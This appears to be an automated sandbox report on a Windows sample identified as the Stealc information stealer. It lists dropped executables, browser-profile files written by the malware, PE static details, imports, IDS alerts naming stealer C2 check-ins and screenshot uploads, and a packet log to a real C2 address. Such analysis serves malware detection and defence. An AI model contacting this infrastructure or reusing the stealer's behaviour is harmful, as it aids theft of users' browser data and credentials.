                                                                                                                                                Preview:PWR,vR....UT...$u6?..=.........*.D...l..dF..k8b....Q.il5^.-.5.Km.3.)D,Fi.z-..-.(\.-...`.C.-H..b.D.P.....V~...%.w...xx=..FSe..^].^.A..}6.Vl ......l..,e .i..r..&....l..S..z.*..nVg........u.{b..^.O>....#...B.......%...t'?..[.....Q4.(....#.UY..<r.4..S:.....s~.&.&$.....f>i.........,.z.D.......|....'..."s.6A.k..............8k...x...J....|y4......_,.5..wHpr.v..8.......c.y.....[NL.EF.5..p.L.`q.;I...).^.WH..m........#.!j.i...L.....J.q..V..]..F[..-..r....1S7.\N......r?........k...z2.0..%._.6. .........,..X.W.d.u?(ru...}./y..6.B..=G..@<.hH......w.......".=S.J..3{XBvt.>.^.Hh;.......$.[..I.lZa........1H.k..6.2@?b.{Y.X..Y .....O4..sbX...j...3)..#g...QK25....i.~.&R..W..C.c.~.....a. .Y..U....aNe.p.....Cn {.~f...6:......s.-../......1....6U.._.@....3P6....SC....R...q.]d....).I....&ey(.#....Q|..U.E....[.I}G..Z....h*....Zs...._.....dc...W..l.Ro...^..W...o...^U..Gg.........r.i.}(..<".W@Y^ *..c..k=...'...|Ia.t..`0.{.......4.yo.e$.n[...{c.'.5.......

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\ProgramData\KFCFBFHIEB.exe
                                                                                                                                                File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4563640
                                                                                                                                                Entropy (8bit):7.906115886926003
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:98304:RpvmMxvdjYr/2BLOizdh/0Rzs24+WhXWXfRqCFh6MacgD5hB:vlVjMuBx0R7RrXpqiUhB
                                                                                                                                                MD5:AF6E384DFABDAD52D43CF8429AD8779C
                                                                                                                                                SHA1:C78E8CD8C74AD9D598F591DE5E49F73CE3373791
                                                                                                                                                SHA-256:F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
                                                                                                                                                SHA-512:B55BA87B275A475E751E13EC9BAC2E7F1A3484057844E210168E2256D73D9B6A7C7C7592845D4A3BF8163CF0D479315418A9F3CB8F2F4832AF88A06867E3DF93
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                                Preview:MZ@.....................................!..L.!Win32 .EXE...$@...PE..L....M.a.....................^.......w......0....@...........................}.....m.F.......................................w.......w.|.............E.............................................................P.w..............................MPRESS1.pw.......?......................MPRESS22.....w.......?..................rsrc...|.....w.......?.............@..............................................................................v2.19w...?. ...o......G>H.r9aQ..(.......`....=....?....!.Z..&I........I18..Z!..Y..s...[QX....a....YY...).v.....n......|)....^f..+.>..84h82g...>*.hb\...E.(.x.....@.8_.9.4U.m..'.s......#.....03.......O..]`..S2.@#.........oF~.*.R..Q..q.o.yn...OA@|....g...F....0.j.......s/..H..+ 0C.!....7s..^H,...... ..{...............D......r.I..,|........u.6......E>q..}....g..).U..ME.'.j}.........7^...w.......Le......k.T.`.#%....b..n.F.&-o..../8S.E..{1.E..,....<.c|b.z.Fz........|..W"p.

                                                                                                                                                C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\627982\Pct.pif
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):32768
                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\627982\Pct.pif
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):32768
                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Entropy (8bit):7.784911068060566
                                                                                                                                                TrID:
                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                File name:file.exe
                                                                                                                                                File size:1'017'773 bytes
                                                                                                                                                MD5:1e31ae89e90ab1a25e4d578b19154bd7
                                                                                                                                                SHA1:955ef96ad52954b6e2eff63b1a35694433e83d9b
                                                                                                                                                SHA256:85104c53c0061dd183981df87ad8744c85d8c8c6f044698a1ed98705edaf4117
                                                                                                                                                SHA512:47df99753fc4c157e7b92695bccb489a91894b5c415d663681b6a98bc6564833d992bcfc3763cb1f4f0e441145bf447930e1f1e4a4945d55dd948a72462036a6
                                                                                                                                                SSDEEP:24576:x73/KiUeGXzuYQyUswjBTioteMwVdqigcHYsA:hPKiUXUyUrTxt0oig2Q
                                                                                                                                                TLSH:C52523676765D13BEEB14CF4093746F20A71A43CE5A826DA4BD07F8AB8B2DC4591B303
                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:08fc70e494d44880

                                                                                                                                                Static PE Info

                                                                                                                                                General

                                                                                                                                                Entrypoint:0x403883
                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                Digitally signed:false
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:5
                                                                                                                                                OS Version Minor:0
                                                                                                                                                File Version Major:5
                                                                                                                                                File Version Minor:0
                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                                                                                                Entrypoint Preview

                                                                                                                                                Instruction
                                                                                                                                                sub esp, 000002D4h
                                                                                                                                                push ebx
                                                                                                                                                push ebp
                                                                                                                                                push esi
                                                                                                                                                push edi
                                                                                                                                                push 00000020h
                                                                                                                                                xor ebp, ebp
                                                                                                                                                pop esi
                                                                                                                                                mov dword ptr [esp+18h], ebp
                                                                                                                                                mov dword ptr [esp+10h], 00409268h
                                                                                                                                                mov dword ptr [esp+14h], ebp
                                                                                                                                                call dword ptr [00408030h]
                                                                                                                                                push 00008001h
                                                                                                                                                call dword ptr [004080B4h]
                                                                                                                                                push ebp
                                                                                                                                                call dword ptr [004082C0h]
                                                                                                                                                push 00000008h
                                                                                                                                                mov dword ptr [00472EB8h], eax
                                                                                                                                                call 00007FB13CC70A3Bh
                                                                                                                                                push ebp
                                                                                                                                                push 000002B4h
                                                                                                                                                mov dword ptr [00472DD0h], eax
                                                                                                                                                lea eax, dword ptr [esp+38h]
                                                                                                                                                push eax
                                                                                                                                                push ebp
                                                                                                                                                push 00409264h
                                                                                                                                                call dword ptr [00408184h]
                                                                                                                                                push 0040924Ch
                                                                                                                                                push 0046ADC0h
                                                                                                                                                call 00007FB13CC7071Dh
                                                                                                                                                call dword ptr [004080B0h]
                                                                                                                                                push eax
                                                                                                                                                mov edi, 004C30A0h
                                                                                                                                                push edi
                                                                                                                                                call 00007FB13CC7070Bh
                                                                                                                                                push ebp
                                                                                                                                                call dword ptr [00408134h]
                                                                                                                                                cmp word ptr [004C30A0h], 0022h
                                                                                                                                                mov dword ptr [00472DD8h], eax
                                                                                                                                                mov eax, edi
                                                                                                                                                jne 00007FB13CC6E00Ah
                                                                                                                                                push 00000022h
                                                                                                                                                pop esi
                                                                                                                                                mov eax, 004C30A2h
                                                                                                                                                push esi
                                                                                                                                                push eax
                                                                                                                                                call 00007FB13CC703E1h
                                                                                                                                                push eax
                                                                                                                                                call dword ptr [00408260h]
                                                                                                                                                mov esi, eax
                                                                                                                                                mov dword ptr [esp+1Ch], esi
                                                                                                                                                jmp 00007FB13CC6E093h
                                                                                                                                                push 00000020h
                                                                                                                                                pop ebx
                                                                                                                                                cmp ax, bx
                                                                                                                                                jne 00007FB13CC6E00Ah
                                                                                                                                                add esi, 02h
                                                                                                                                                cmp word ptr [esi], bx

                                                                                                                                                Rich Headers

                                                                                                                                                Programming Language:
                                                                                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                                                                                • [ C ] VS2010 SP1 build 40219
                                                                                                                                                • [RES] VS2010 SP1 build 40219
                                                                                                                                                • [LNK] VS2010 SP1 build 40219

                                                                                                                                                Data Directories

                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000x16da0.rsrc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                Sections

                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                .text0x10000x6dae0x6e0000499a6f70259150109c809d6aa0e6edFalse0.6611150568181818data6.508529563136936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                .rsrc0xf40000x16da00x16e008d6f1c547637a9d033ec7d02d848eba1False0.26442964480874315data3.5278926498893504IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                .reloc0x10b0000xf320x1000620f0b67a91f7f74151bc5be745b7110False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                Resources

                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                RT_ICON0xf41c00x11028Device independent bitmap graphic, 128 x 256 x 32, image size 69632EnglishUnited States0.24800493742105867
                                                                                                                                                RT_ICON0x1051e80x5638Device independent bitmap graphic, 72 x 144 x 32, image size 22032EnglishUnited States0.2928144255164915
                                                                                                                                                RT_DIALOG0x10a8200x100dataEnglishUnited States0.5234375
                                                                                                                                                RT_DIALOG0x10a9200x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                RT_DIALOG0x10aa400x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                RT_GROUP_ICON0x10aaa00x22dataEnglishUnited States1.0
                                                                                                                                                RT_MANIFEST0x10aac80x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                                                                                                                Imports

                                                                                                                                                DLLImport
                                                                                                                                                KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                                USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                                GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                                SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                                ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                                COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                                VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                                                                                Possible Origin

                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                EnglishUnited States

                                                                                                                                                Network Behavior

                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                2024-10-06T22:18:40.621922+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.66388545.145.4.23480TCP
                                                                                                                                                2024-10-06T22:18:40.805920+02002044244ET MALWARE Win32/Stealc Requesting browsers Config from C21192.168.2.66388545.145.4.23480TCP
                                                                                                                                                2024-10-06T22:18:40.811887+02002044245ET MALWARE Win32/Stealc Active C2 Responding with browsers Config145.145.4.23480192.168.2.663885TCP
                                                                                                                                                2024-10-06T22:18:40.986876+02002044246ET MALWARE Win32/Stealc Requesting plugins Config from C21192.168.2.66388545.145.4.23480TCP
                                                                                                                                                2024-10-06T22:18:40.995303+02002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config145.145.4.23480192.168.2.663885TCP
                                                                                                                                                2024-10-06T22:18:41.490286+02002044248ET MALWARE Win32/Stealc Submitting System Information to C21192.168.2.66388545.145.4.23480TCP
                                                                                                                                                2024-10-06T22:18:41.954591+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.66388545.145.4.23480TCP
                                                                                                                                                2024-10-06T22:18:45.687780+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.66388545.145.4.23480TCP
                                                                                                                                                2024-10-06T22:18:46.599644+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.66388545.145.4.23480TCP
                                                                                                                                                2024-10-06T22:18:47.174523+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.66388545.145.4.23480TCP
                                                                                                                                                2024-10-06T22:18:47.770123+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.66388545.145.4.23480TCP
                                                                                                                                                2024-10-06T22:18:49.399754+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.66388545.145.4.23480TCP
                                                                                                                                                2024-10-06T22:18:49.858554+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.66388545.145.4.23480TCP
                                                                                                                                                2024-10-06T22:18:51.307264+02002044249ET MALWARE Win32/Stealc Submitting Screenshot to C21192.168.2.66388545.145.4.23480TCP
                                                                                                                                                2024-10-06T22:18:54.054899+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.663886103.6.198.219443TCP
                                                                                                                                                2024-10-06T22:18:54.054899+02002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.663886103.6.198.219443TCP

                                                                                                                                                Network Port Distribution

                                                                                                                                                TCP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Oct 6, 2024 22:18:39.774887085 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:39.779947996 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:39.780030012 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:39.780683994 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:39.785536051 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:40.390141010 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:40.390305042 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:40.396630049 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:40.401707888 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:40.621853113 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:40.621922016 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:40.624782085 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:40.629586935 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:40.805855989 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:40.805919886 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:40.805974960 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:40.806013107 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:40.807025909 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:40.811887026 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:40.986713886 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:40.986876011 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:40.986906052 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:40.986918926 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:40.986967087 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:40.987517118 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:40.987528086 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:40.987577915 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:40.988456964 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:40.988471031 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:40.988481045 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:40.988493919 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:40.988513947 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:40.988528013 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:40.990478039 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:40.995302916 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:41.171375990 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:41.171655893 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:41.189786911 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:41.189837933 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:41.194737911 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:41.194750071 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:41.194844007 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:41.195009947 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:41.490134001 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:41.490286112 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:41.766841888 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:41.771945953 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:41.954509974 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:41.954520941 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:41.954534054 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:41.954591036 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:41.955296040 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:41.955302954 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:41.955343008 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:41.956140041 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:41.956146002 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:41.956192017 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:41.957078934 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:41.957086086 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:41.957135916 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:41.958043098 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:41.958050013 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:41.958096981 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:41.958899021 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:41.959883928 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.027904034 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.027915955 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.027923107 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.027928114 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.027934074 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.027956009 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.027997017 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.028017044 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.028033018 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.028351068 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.028363943 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.028392076 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.028404951 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.029321909 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.029328108 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.029331923 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.029350996 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.029351950 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.029376030 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.029402971 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.029891968 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.029928923 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.030179977 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.030189991 CEST806388545.145.4.234192.168.2.6
